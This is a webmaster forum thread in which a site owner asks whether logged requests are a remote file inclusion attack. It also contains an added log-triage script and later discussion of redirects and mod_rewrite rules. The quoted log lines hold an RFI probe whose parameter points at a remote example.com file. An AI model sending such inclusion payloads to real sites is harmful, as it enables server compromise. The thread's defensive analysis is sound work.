
How do you know if an RFI attack was successful?

         

proboscis

7:18 pm on Apr 19, 2011 (gmt 0)

10+ Year Member




This is in my logs, is it an RFI attack? If so, how do I know if the attack was successful, would it be obvious?

[07/Apr/2011:14:30:55 -0400] "GET //administrator/components/com_tom/install.tom.php?mosConfig_absolute_path=http://www.example.com/libraries/pear/a? HTTP/1.1" 301 433 "-" "Mozilla/5.0"


[07/Apr/2011:14:30:55 -0400] "GET /tom.shtml//administrator/components/com_tom/install.tom.php?mosConfig_absolute_path=http://www.example.com/libraries/pear/a? HTTP/1.1" 301 448 "-" "Mozilla/5.0"

Thanks!

g1smd

11:29 pm on Apr 19, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



That's someone looking for some sort of exploit in Joomla.

Your server redirected the request to a different URL.

Whether the user followed that redirect or not is unknown, and if they did, neither is the result.

proboscis

12:50 am on Apr 20, 2011 (gmt 0)

10+ Year Member




Oh, thank you, I don't use Joomla so this kind of attack wouldn't work on my site?

Sorry I'm dumb lol

phranque

7:19 am on Apr 20, 2011 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



you need to make those same requests and check the response and see if you are exposing any vulnerabilities with that response.
since it is a 301 redirect, you need to see what location the redirect is suggesting.
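
Added example, not part of any post in this thread: a Python script that finds requests like the ones logged above, where a query parameter carries an absolute remote URL, and groups them by response status to suggest a next step. The first sample line is from the thread; the other sample lines, the function names and the status-to-verdict mapping are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl

# First line is from the thread; the rest are constructed for illustration.
SAMPLE_LOG = [
    '[07/Apr/2011:14:30:55 -0400] "GET //administrator/components/com_tom/install.tom.php'
    '?mosConfig_absolute_path=http://www.example.com/libraries/pear/a? HTTP/1.1" 301 433 "-" "Mozilla/5.0"',
    '[07/Apr/2011:14:31:02 -0400] "GET /index.php?page=http%3A%2F%2Fwww.example.com%2Fa%3F HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '[07/Apr/2011:14:31:09 -0400] "GET /missing.php?inc=ftp://www.example.com/a HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '[07/Apr/2011:14:31:15 -0400] "GET /tom.shtml?ref=newsletter HTTP/1.1" 200 8342 "-" "Mozilla/5.0"',
]

# Matches with or without the leading host/ident/user fields of the combined log format.
LINE_RE = re.compile(r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Heuristic next step per status class (an assumption of this example, not proof either way).
VERDICTS = {2: 'investigate', 3: 'replay-and-check-location', 4: 'rejected', 5: 'investigate'}


def remote_params(target):
    """Return (name, value) query parameters whose decoded value is an absolute remote URL."""
    _, _, query = target.partition('?')  # manual split: a leading '//' confuses urlsplit
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True) if REMOTE_RE.match(v)]


def triage(lines):
    """Yield a dict for every request that carries a remote URL in a query parameter."""
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        hits = remote_params(m['target'])
        if hits:
            status = int(m['status'])
            yield {'time': m['ts'], 'status': status, 'params': hits,
                   'verdict': VERDICTS.get(status // 100, 'investigate')}


if __name__ == '__main__':
    for finding in triage(SAMPLE_LOG):
        print(finding['time'], finding['status'], finding['verdict'], finding['params'])
```

A 2xx only means the server answered the probe with content; confirming whether anything was included still requires replaying the request and inspecting the response, as suggested above.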

proboscis

8:51 pm on Apr 20, 2011 (gmt 0)

10+ Year Member



The first one redirects to my 404 html page.

and the second one redirects to a page that I actually have "tom.shtml" but it keeps everything after the ? on the end of my url...

What should I do?

g1smd

8:55 pm on Apr 20, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Well, it is your site that issues the redirect when that request is received. Why does it do that? What is the purpose of the redirect?


I hope there is no "redirect to the 404 page". That would be SEO suicide.

phranque

12:23 am on Apr 21, 2011 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



there is almost no case for a redirect to a "404 html page" ever being the correct response.
the correct response is typically to return a 404 Not Found status code.
then configure the server to provide the "404 html page" content as a custom error page for 404 status code responses.

regarding the query string in the redirected url, it depends on your server of course, but assuming apache and mod_rewrite...
http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewriterule:
Note: Query String
When you want to erase an existing query string, end the substitution string with just a question mark.

proboscis

7:26 pm on Apr 21, 2011 (gmt 0)

10+ Year Member



Okay, I have some problems and I don't know how to fix them.

First, a bunch of urls were indexed with a double slash, with an extra trailing slash, and with the wrong subdirectory but they would all go to the same page.

Like this, different urls all going to the same page:

example.com/page.html
example.com//page.html
example.com//page.html/
example.com/something/page.html

So I now have redirects that are supposed to make each extra url go to one page, but I am having some unwanted results.

For example if a page doesn't exist but the url has a double slash then a 301 is returned instead of a 404, and the 301 is to my custom 404 page.

I tried just removing the redirect code but the duplicate urls immediately came back, it's a mess.

The first thing I guess to do is to try and find out where the urls are coming from in the first place? Then what do I do?

Thanks so much you guys!

proboscis

7:34 pm on Apr 21, 2011 (gmt 0)

10+ Year Member



I shouldn't have tried this without knowing what I'm doing.

Options +FollowSymLinks
RewriteEngine on
# Remove multiple slashes anywhere in URL
RewriteCond %{REQUEST_URI} ^(.*)//(.*)$
RewriteRule . http://www.example.com%1/%2 [R=301,L]
#
# Remove trailing slash if filetype present in URL
RewriteRule ^(.+\.[^/]+)/$ http://www.example.com/$1 [R=301,L]

# Remove extra URL-path info if filetype present in URL
RewriteRule ^([^.]+\.[^/]+)/ http://www.example.com/$1 [R=301,L]

RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /([^/]+/)*index\.shtml\ HTTP/
RewriteRule ^(([^/]+/)*)index\.shtml$ http://www.example.com/$1 [R=301,L]

RewriteCond %{REQUEST_URI} !^/404\.html$
RewriteCond %{HTTP_HOST} ^example\.com [OR]
RewriteCond %{HTTP_HOST} ^www\.example\.com\. [OR]
RewriteCond %{HTTP_HOST} ^www\.example\.com\:[0-9]+
RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]

#